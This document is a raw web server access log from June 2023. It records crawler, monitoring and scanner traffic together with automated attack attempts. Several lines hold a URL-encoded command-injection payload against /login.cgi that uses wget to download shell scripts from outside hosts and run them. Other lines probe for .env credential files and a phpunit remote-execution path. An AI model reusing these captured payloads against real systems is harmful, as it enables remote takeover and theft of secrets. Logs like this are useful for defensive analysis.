109.205.213.39 - - [03/Jun/2023:05:40:58 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.213.7/8UsA.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "r00ts3c-owned-you"
126.77.206.93 - - [03/Jun/2023:05:41:12 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://192.210.162.147/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1" 400 329 "-" "r00ts3c-owned-you"
141.98.11.41 - - [03/Jun/2023:05:42:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
52.162.218.19 - - [03/Jun/2023:05:46:04 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
52.162.218.19 - - [03/Jun/2023:05:46:07 +0200] "GET /sendgrid.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
52.162.218.19 - - [03/Jun/2023:05:46:11 +0200] "GET /core/.env HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
52.162.218.19 - - [03/Jun/2023:05:46:14 +0200] "GET /vendor/.env HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
52.162.218.19 - - [03/Jun/2023:05:46:17 +0200] "GET /assets/.env HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
52.162.218.19 - - [03/Jun/2023:05:46:21 +0200] "GET /storage/.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
52.162.218.19 - - [03/Jun/2023:05:46:25 +0200] "GET /public/.env HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
52.162.218.19 - - [03/Jun/2023:05:46:28 +0200] "GET /app/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
52.162.218.19 - - [03/Jun/2023:05:46:31 +0200] "GET /admin/.env HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
52.162.218.19 - - [03/Jun/2023:05:46:34 +0200] "GET /laravel/.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
52.162.218.19 - - [03/Jun/2023:05:46:38 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
52.162.218.19 - - [03/Jun/2023:05:46:42 +0200] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
52.162.218.19 - - [03/Jun/2023:05:46:50 +0200] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
34.138.56.101 - - [03/Jun/2023:05:48:18 +0200] "GET /robots.txt HTTP/1.0" 404 327 "-" "ZoominfoBot (zoominfobot at zoominfo dot com)"
34.138.56.101 - - [03/Jun/2023:05:48:18 +0200] "GET / HTTP/1.0" 200 1229 "-" "ZoominfoBot (zoominfobot at zoominfo dot com)"
52.162.218.19 - - [03/Jun/2023:05:48:27 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
52.162.218.19 - - [03/Jun/2023:05:48:31 +0200] "GET /sendgrid.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
52.162.218.19 - - [03/Jun/2023:05:48:34 +0200] "GET /core/.env HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
52.162.218.19 - - [03/Jun/2023:05:48:37 +0200] "GET /vendor/.env HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
52.162.218.19 - - [03/Jun/2023:05:48:41 +0200] "GET /assets/.env HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
222.110.198.89 - - [03/Jun/2023:05:48:42 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://192.210.162.147/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1" 400 329 "-" "r00ts3c-owned-you"
52.162.218.19 - - [03/Jun/2023:05:48:44 +0200] "GET /storage/.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
52.162.218.19 - - [03/Jun/2023:05:48:47 +0200] "GET /public/.env HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
52.162.218.19 - - [03/Jun/2023:05:48:51 +0200] "GET /app/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
52.162.218.19 - - [03/Jun/2023:05:48:54 +0200] "GET /admin/.env HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
52.162.218.19 - - [03/Jun/2023:05:48:57 +0200] "GET /laravel/.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
52.162.218.19 - - [03/Jun/2023:05:49:00 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
52.162.218.19 - - [03/Jun/2023:05:49:04 +0200] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
52.162.218.19 - - [03/Jun/2023:05:49:12 +0200] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
126.77.206.93 - - [03/Jun/2023:05:55:19 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://192.210.162.147/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1" 400 329 "-" "r00ts3c-owned-you"
109.205.213.39 - - [03/Jun/2023:05:56:31 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.213.7/8UsA.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "r00ts3c-owned-you"
205.210.31.162 - - [03/Jun/2023:06:04:46 +0200] "\x16\x03\x01" 501 318 "-" "-"
54.36.148.178 - - [03/Jun/2023:06:11:44 +0200] "GET /robots.txt HTTP/1.1" 404 327 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
170.64.130.249 - - [03/Jun/2023:06:11:46 +0200] "\x16\x03\x01" 501 318 "-" "-"
54.36.148.80 - - [03/Jun/2023:06:11:46 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
170.64.130.249 - - [03/Jun/2023:06:11:46 +0200] "\x16\x03\x01" 501 318 "-" "-"
170.64.130.249 - - [03/Jun/2023:06:11:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
170.64.130.249 - - [03/Jun/2023:06:11:48 +0200] "GET /client/get_targets HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
170.64.130.249 - - [03/Jun/2023:06:11:48 +0200] "GET /upl.php HTTP/1.1" 404 312 "-" "Mozilla/5.0"
170.64.130.249 - - [03/Jun/2023:06:11:49 +0200] "\x16\x03\x01" 501 318 "-" "-"
170.64.130.249 - - [03/Jun/2023:06:11:49 +0200] "GET /geoip/ HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
170.64.130.249 - - [03/Jun/2023:06:11:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Mobile/15E148 Snapchat/10.77.0.54 (like Safari/604.1)"
170.64.130.249 - - [03/Jun/2023:06:11:51 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
170.64.130.249 - - [03/Jun/2023:06:11:51 +0200] "GET /1.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
170.64.130.249 - - [03/Jun/2023:06:11:52 +0200] "GET /bundle.js HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
108.18.130.219 - - [03/Jun/2023:06:13:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
52.162.218.19 - - [03/Jun/2023:06:16:05 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
52.162.218.19 - - [03/Jun/2023:06:16:12 +0200] "GET /sendgrid.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
52.162.218.19 - - [03/Jun/2023:06:16:17 +0200] "GET /core/.env HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
52.162.218.19 - - [03/Jun/2023:06:16:21 +0200] "GET /vendor/.env HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
52.162.218.19 - - [03/Jun/2023:06:16:28 +0200] "GET /assets/.env HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
52.162.218.19 - - [03/Jun/2023:06:16:34 +0200] "GET /storage/.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
52.162.218.19 - - [03/Jun/2023:06:16:39 +0200] "GET /public/.env HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
52.162.218.19 - - [03/Jun/2023:06:16:44 +0200] "GET /app/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
52.162.218.19 - - [03/Jun/2023:06:16:49 +0200] "GET /admin/.env HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
52.162.218.19 - - [03/Jun/2023:06:16:54 +0200] "GET /laravel/.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
52.162.218.19 - - [03/Jun/2023:06:16:59 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
52.162.218.19 - - [03/Jun/2023:06:17:04 +0200] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
52.162.218.19 - - [03/Jun/2023:06:17:15 +0200] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
109.205.213.43 - - [03/Jun/2023:06:18:08 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.213.7/8UsA.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "r00ts3c-owned-you"
198.235.24.137 - - [03/Jun/2023:06:22:55 +0200] "\x16\x03\x01" 501 318 "-" "-"
197.157.192.246 - - [03/Jun/2023:06:26:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
144.137.212.146 - - [03/Jun/2023:06:27:08 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://192.210.162.147/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1" 400 329 "-" "r00ts3c-owned-you"
109.205.213.108 - - [03/Jun/2023:06:30:59 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.213.7/8UsA.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "r00ts3c-owned-you"
205.210.31.248 - - [03/Jun/2023:06:33:15 +0200] "\x16\x03\x01" 501 318 "-" "-"
198.235.24.50 - - [03/Jun/2023:06:33:25 +0200] "\x16\x03\x01" 501 318 "-" "-"
34.67.136.168 - - [03/Jun/2023:06:34:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; tchelebi/1.0; +http://tchelebi.io)"
109.205.213.41 - - [03/Jun/2023:06:35:44 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.213.7/8UsA.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "r00ts3c-owned-you"
109.205.213.43 - - [03/Jun/2023:06:38:52 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.213.7/8UsA.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "r00ts3c-owned-you"
198.199.95.11 - - [03/Jun/2023:06:54:53 +0200] "MGLNDD_212.91.246.85_80" 501 338 "-" "-"
162.216.150.218 - - [03/Jun/2023:06:55:08 +0200] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
198.199.95.11 - - [03/Jun/2023:06:55:31 +0200] "MGLNDD_212.91.246.86_80" 501 338 "-" "-"
198.199.95.11 - - [03/Jun/2023:06:56:07 +0200] "MGLNDD_212.91.246.89_80" 501 338 "-" "-"
198.199.95.11 - - [03/Jun/2023:06:56:28 +0200] "MGLNDD_212.91.246.80_80" 501 338 "-" "-"
198.199.95.11 - - [03/Jun/2023:06:56:41 +0200] "MGLNDD_212.91.246.82_80" 501 338 "-" "-"
198.199.95.11 - - [03/Jun/2023:06:56:57 +0200] "MGLNDD_212.91.246.88_80" 501 338 "-" "-"
198.199.95.11 - - [03/Jun/2023:06:57:43 +0200] "MGLNDD_212.91.246.87_80" 501 338 "-" "-"
198.199.95.11 - - [03/Jun/2023:06:58:48 +0200] "MGLNDD_212.91.246.83_80" 501 338 "-" "-"
198.199.95.11 - - [03/Jun/2023:06:59:08 +0200] "MGLNDD_212.91.246.84_80" 501 338 "-" "-"
198.199.95.11 - - [03/Jun/2023:07:00:04 +0200] "MGLNDD_212.91.246.81_80" 501 338 "-" "-"
212.91.246.72 - - [03/Jun/2023:07:00:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jun/2023:07:01:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jun/2023:07:02:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
205.210.31.87 - - [03/Jun/2023:07:02:30 +0200] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
212.91.246.72 - - [03/Jun/2023:07:03:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
51.158.37.186 - - [03/Jun/2023:07:04:06 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:104.0) Gecko/20100101 Firefox/104.0"
51.158.37.186 - - [03/Jun/2023:07:04:07 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:104.0) Gecko/20100101 Firefox/104.0"
193.35.18.231 - - [03/Jun/2023:07:04:12 +0200] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
212.91.246.72 - - [03/Jun/2023:07:04:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jun/2023:07:05:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
80.66.88.204 - - [03/Jun/2023:07:06:04 +0200] "\x03" 501 316 "-" "-"
212.91.246.72 - - [03/Jun/2023:07:06:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jun/2023:07:07:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
167.172.176.101 - - [03/Jun/2023:07:07:37 +0200] "\x16\x03\x01" 501 318 "-" "-"
167.172.176.101 - - [03/Jun/2023:07:07:37 +0200] "\x16\x03\x01" 501 318 "-" "-"
167.172.176.101 - - [03/Jun/2023:07:07:37 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
167.172.176.101 - - [03/Jun/2023:07:07:38 +0200] "GET /client/get_targets HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
167.172.176.101 - - [03/Jun/2023:07:07:38 +0200] "GET /upl.php HTTP/1.1" 404 312 "-" "Mozilla/5.0"
167.172.176.101 - - [03/Jun/2023:07:07:38 +0200] "\x16\x03\x01" 501 318 "-" "-"
167.172.176.101 - - [03/Jun/2023:07:07:38 +0200] "GET /geoip/ HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
167.172.176.101 - - [03/Jun/2023:07:07:38 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Mobile/15E148 Snapchat/10.77.0.54 (like Safari/604.1)"
167.172.176.101 - - [03/Jun/2023:07:07:38 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
167.172.176.101 - - [03/Jun/2023:07:07:38 +0200] "GET /1.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
167.172.176.101 - - [03/Jun/2023:07:07:38 +0200] "GET /bundle.js HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
197.232.30.172 - - [03/Jun/2023:07:07:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [03/Jun/2023:07:08:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jun/2023:07:09:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jun/2023:07:10:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jun/2023:07:11:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jun/2023:07:12:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jun/2023:07:13:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
64.62.197.75 - - [03/Jun/2023:07:13:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36"
65.49.20.69 - - [03/Jun/2023:07:14:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0"
212.91.246.72 - - [03/Jun/2023:07:14:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jun/2023:07:15:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
64.62.197.75 - - [03/Jun/2023:07:15:29 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
212.91.246.72 - - [03/Jun/2023:07:16:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
64.62.197.62 - - [03/Jun/2023:07:16:22 +0200] "GET /geoserver/web/ HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36"
109.205.213.5 - - [03/Jun/2023:07:16:44 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.213.7/8UsA.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "r00ts3c-owned-you"
65.49.20.69 - - [03/Jun/2023:07:17:11 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0"
212.91.246.72 - - [03/Jun/2023:07:17:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jun/2023:07:18:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
65.49.20.69 - - [03/Jun/2023:07:18:22 +0200] "GET /geoserver/web/ HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0"
212.91.246.72 - - [03/Jun/2023:07:19:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jun/2023:07:20:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
147.75.127.101 - - [03/Jun/2023:07:20:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [03/Jun/2023:07:21:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jun/2023:07:22:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jun/2023:07:23:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jun/2023:07:24:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jun/2023:07:25:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
